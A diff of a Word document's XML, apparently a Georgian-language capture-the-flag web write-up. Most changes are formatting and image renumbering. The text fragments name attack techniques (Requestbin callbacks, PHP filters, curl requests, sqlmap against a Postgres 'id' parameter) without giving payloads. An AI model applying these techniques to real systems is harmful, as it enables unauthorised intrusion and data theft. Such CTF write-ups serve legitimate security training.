@@ -2041,7 +2643,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2125,7 +2727,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2241,6 +2843,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -2261,7 +2864,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2318,6 +2921,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -2339,7 +2943,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2404,6 +3008,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -2424,7 +3029,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2515,6 +3120,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -2536,7 +3142,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32"/>
+                    <a:blip r:embed="rId33"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2618,6 +3224,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -2638,7 +3245,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2806,6 +3413,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -2826,7 +3434,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2863,12 +3471,21 @@
         </w:rPr>
         <w:t xml:space="preserve">ვნახოთ რა მოხდა </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Requestbin </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Requestbin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2889,6 +3506,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -2909,7 +3527,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3063,6 +3681,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -3082,7 +3701,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3156,6 +3775,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -3176,7 +3796,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3207,6 +3827,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -3227,7 +3848,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38"/>
+                    <a:blip r:embed="rId39"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3291,6 +3912,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -3310,7 +3932,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3338,12 +3960,357 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>როგორც ვხედავთ გამოდის ასეთი ტექსტი რაც მიგვანიშნებს იმაზე რომ ეს შეიძლება ფლაგ იყოს მაგრამ საჭიროა რომ დავშიფროთ იგი და გამოვიყენოთ შეგვიძლია php filte</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>როგორც</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ვხედავთ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>გამოდის</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ასეთი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ტექსტი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>რაც</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>მიგვანიშნებს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>იმაზე</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>რომ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ეს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>შეიძლება</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ფლაგ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>იყოს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>მაგრამ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>საჭიროა</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>რომ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>დავშიფროთ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>იგი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>და</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>გამოვიყენოთ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>შეგვიძლია</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> filte</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3362,6 +4329,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -3382,7 +4350,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId41"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3429,6 +4397,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -3449,7 +4418,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3496,6 +4465,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -3516,7 +4486,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42"/>
+                    <a:blip r:embed="rId43"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3612,6 +4582,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -3631,7 +4602,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43"/>
+                    <a:blip r:embed="rId44"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3675,23 +4646,7 @@
           <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>გვაქვს ველი მოცემული</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="ka-GE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="ka-GE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">მაგრამ არ ვიცით როგორ მუშაობს.მოდივცადოთ დაგავწეროთ რამდენად სწორად გადის ჩვენირექვესტი.მაგალითისთვის ავიღოთ </w:t>
+        <w:t xml:space="preserve">გვაქვს ველი მოცემული, მაგრამ არ ვიცით როგორ მუშაობს.მოდივცადოთ დაგავწეროთ რამდენად სწორად გადის ჩვენირექვესტი.მაგალითისთვის ავიღოთ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3743,6 +4698,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -3763,7 +4719,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId44"/>
+                    <a:blip r:embed="rId45"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3886,6 +4842,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -3906,7 +4863,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId45"/>
+                    <a:blip r:embed="rId46"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3954,6 +4911,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -3975,7 +4933,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId46"/>
+                    <a:blip r:embed="rId47"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4046,7 +5004,7 @@
         </w:rPr>
         <w:t xml:space="preserve">შემდეგი მისამართი. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId47" w:history="1">
+      <w:hyperlink r:id="rId48" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4076,6 +5034,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4096,7 +5055,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId48"/>
+                    <a:blip r:embed="rId49"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4177,6 +5136,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4197,7 +5157,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId49"/>
+                    <a:blip r:embed="rId50"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4253,6 +5213,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4273,7 +5234,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId50"/>
+                    <a:blip r:embed="rId51"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4403,6 +5364,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4424,7 +5386,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId51"/>
+                    <a:blip r:embed="rId52"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4506,6 +5468,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4526,7 +5489,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId52"/>
+                    <a:blip r:embed="rId53"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4622,6 +5585,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4642,7 +5606,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId53"/>
+                    <a:blip r:embed="rId54"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4746,6 +5710,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4767,7 +5732,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId54"/>
+                    <a:blip r:embed="rId55"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4871,6 +5836,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -4891,7 +5857,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId55"/>
+                    <a:blip r:embed="rId56"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4932,6 +5898,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">PHP </w:t>
       </w:r>
@@ -4956,6 +5923,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">curl </w:t>
       </w:r>
@@ -5034,6 +6002,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5055,7 +6024,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId56"/>
+                    <a:blip r:embed="rId57"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5151,6 +6120,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5171,7 +6141,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId57"/>
+                    <a:blip r:embed="rId58"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5238,6 +6208,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t>small data leak</w:t>
       </w:r>
@@ -5245,6 +6216,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -5252,6 +6224,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -5274,6 +6247,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5295,7 +6269,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId58"/>
+                    <a:blip r:embed="rId59"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5353,11 +6327,13 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5378,7 +6354,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId59"/>
+                    <a:blip r:embed="rId60"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5469,6 +6445,7 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5489,7 +6466,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId60"/>
+                    <a:blip r:embed="rId61"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5530,7 +6507,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-          <w:lang w:val="ru-RU"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">sqlmap </w:t>
       </w:r>
@@ -5546,6 +6523,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t xml:space="preserve">id </w:t>
       </w:r>
@@ -5578,6 +6556,7 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:t>POSTGRES</w:t>
       </w:r>
@@ -5585,11 +6564,13 @@
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
@@ -5610,7 +6591,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId61"/>
+                    <a:blip r:embed="rId62"/>
